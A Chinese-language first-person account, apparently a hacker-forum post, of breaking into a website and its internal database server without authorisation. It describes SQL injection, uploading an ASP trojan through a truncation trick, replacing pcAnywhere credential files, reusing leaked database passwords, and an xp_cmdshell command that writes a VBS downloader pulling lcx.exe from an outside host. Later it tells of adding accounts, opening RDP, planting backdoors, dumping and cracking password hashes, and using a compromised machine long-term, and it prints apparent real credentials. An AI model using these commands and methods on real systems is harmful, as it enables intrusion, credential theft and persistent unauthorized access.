最重要的经验就是我们要有一个思想:管理员怎么进去的,我们就怎么进去.

   这个站的渗透也比较慢长,花了一周多的样子.网站很偏僻的地方存在一个注入点,是db权限的,很遗憾不是sa的，但是不能列目录，还好可以猜解管理员的密码，在adminlogin表中得到了管理员的密码:1qaz3edc@22$够复杂，登录后台，不能直接上传，在上传图片的地方抓包，然后利用截断字符改包上传，得到一个asp木马．

　得到的是一个主站的webshell，但是权限很低，没有修改权限，主站服务器只开了一个80和5631，可能文件传输也是通过5631传输的，有pcanywhere好，原以为有戏，可把host目录中的cif文件下下来用破解器打开一个，用户名和密码都是乱码，遇到过很多这种情况，我也搞不懂原因．可能是它的用户名用了繁体字的原因吧．

　试着上传一个知道用户名和密码的cif文件到host目录下，可还是不行，以前没试过，但听说行的，只得试试了，试了好久还是用我这个传上去的cif文件的用户名和密码登不进．索性把它的给删了，把我传上去的cif文件名改成他的文件名，ok，pcanywhere第一次连接出错，再次连接，连接成功，但对方服务器使用的是win2003，桌面被锁定，还需要windows系统的用户名和密码才可以登录．这里就卡起了，怎么找到系统的用户名和密码？我利用得到的密码变了很多方式去猜了一下，都猜不出来系统的登录密码．

　我漫无目的的在webshell里逛，便去看了看它的数据库连接用户名和密码是什么，因为管理员很多时候密码是一样的．但很失望，conn.asp里面的连接是连到192.168.0.10里面的，用户名是xxxweb,密码是xxxweb@10abcd123,得到个密码也好,很显示数据库是连的内网中的另一台服务器.便把这个密码用来试了一下系统密码,也不是,登不进去.

   有可能数据库服务器的sa用户用的也是这个密码,在webshell上用sqledit连接这个数据库服务器的sa用户,密码用得到的这个密码,连接成功,还好,有机会把这台数据库服务器拿下来了.

   执行命令:exec master..xp_cmdshell 'echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://www.ncph.net/lcx.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:c.exe^",2 >down.vbs' 便将down.vbs写入到数据库服务器里,再运行cscript down.vbs便从http://www.ncph.net/上下载了lcx.exe文件,并保存在c盘c:c.exe.
   然后执行exec master..xp_cmdshell 'net user ' ...........等等命令添加一个用户,开启3389,还好是2003的系统,不用重启,最后转发到我的机器(因为数据库是一个内网机器,这里知道的也只是一个内网ip所以用转发,同时也可以突破它的防火墙.)

   登上3389后的第一件事就是留后门,但遗憾的是我的反弹后门和端口复用后门都没法弹回来，看来对方装有硬防．然后在数据库服务器上下载http://www.ncph.net/sam.rar抓取数据库服务器的hash.我相信管理员数据库服务器和管理员主站服务器是用的同一个密码,当然这也要看运气,我遇到的百分之八十的站是这样的情况.

   然后我登上我平时常用的肉机,跑hash去了,当然用lc5跑,下载地址:http://www.ncph.net/lc5.zip
   现在就回到文章前面所说的了,我跑hash这台肉机不错,用了大半年了,当初是用imail溢出得到的,上面只装了一个imail服务,管理员很少上,所以我一直占用它的服务器,常用来跑密码.一般hash不太复杂两天时间就跑出来了,可这个密码我跑了一周时间,还用了全组合,还好,今天上去一看,跑出来了.

   用得到的用户名和密码去登录主站的系统,先连pcanywhere,郁闷,连不上了,好像是延时,打开它的网站,很慢,以前很快的,想起了,可能是因为最近台湾地震,损坏了大陆的光纤,最近国外很多大网站都打不开,这边打开他的站很慢也是正常的.